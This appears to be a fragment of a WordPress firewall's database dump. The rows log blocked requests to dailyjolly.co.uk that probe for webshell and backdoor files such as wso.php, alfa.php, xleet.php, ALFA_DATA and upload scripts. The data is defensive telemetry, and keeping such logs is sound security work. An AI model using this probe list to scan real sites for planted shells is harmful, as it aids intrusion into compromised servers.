User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12306,1674889486.027815,1674889485.914100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12307,1674889485.480858,1674889485.347100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12308,1674890648.571201,1674890648.445000,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12309,1674890597.612099,1674890597.485500,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12310,1674890543.275386,1674890543.145500,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12311,1674890361.677524,1674890361.551100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12312,1674890949.530264,1674890949.404900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12313,1674890840.694107,1674890840.554700,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12314,1674890812.188198,1674890812.060800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12315,1674890811.826362,1674890811.699900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12316,1674891381.852476,1674891381.721200,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12317,1674891329.441168,1674891329.276800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12318,1674891306.433650,1674891306.302600,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12319,1674891064.133927,1674891064.007600,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12320,1674891029.351786,1674891029.224600,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12321,1674891616.923028,1674891616.786600,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12322,1674891616.621526,1674891616.474900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12323,1674891616.310289,1674891616.198800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12324,1674891616.034735,1674891615.913600,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12325,1674891615.749710,1674891615.642200,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12326,1674891615.478450,1674891615.348900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12327,1674891615.182321,1674891615.072600,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12328,1674891614.909771,1674891614.765800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12329,1674891614.600353,1674891614.453600,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12330,1674891614.281223,1674891614.154400,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12331,1674891613.990632,1674891613.843100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12332,1674891613.670839,1674891613.562500,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12333,1674891613.399833,1674891613.291500,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12334,1674891613.128127,1674891613.019300,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12335,1674891612.854254,1674891612.745800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12336,1674891612.554306,1674891612.416300,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12337,1674891612.251990,1674891612.142700,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12338,1674891611.898679,1674891611.734100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12339,1674891611.490890,1674891611.364900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12340,1674891587.201280,1674891587.074400,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12341,1674891580.408722,1674891580.299300,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(12342,1674891579.620082,1674891579.510900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12343,1674891578.735425,1674891578.626900,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12344,1674891577.964147,1674891577.852300,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12345,1674891577.173140,1674891577.063700,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(12346,1674891576.359086,1674891576.248200,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12347,1674891575.623877,1674891575.514200,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(12348,1674891574.504484,1674891574.356700,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12349,1674891573.653203,1674891573.538100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12350,1674891572.776068,1674891572.661500,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12351,1674891572.019570,1674891571.899100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(12352,1674891571.261679,1674891571.153000,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12353,1674891570.493599,1674891570.385400,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12354,1674891569.719007,1674891569.612100,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12355,1674891568.970008,1674891568.862700,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12356,1674891568.208277,1674891568.099800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12357,1674891567.234892,1674891567.116800,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12358,1674891566.072406,1674891565.960700,'\0\0\0\0\0\0\0\0\0\0��\rZ)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 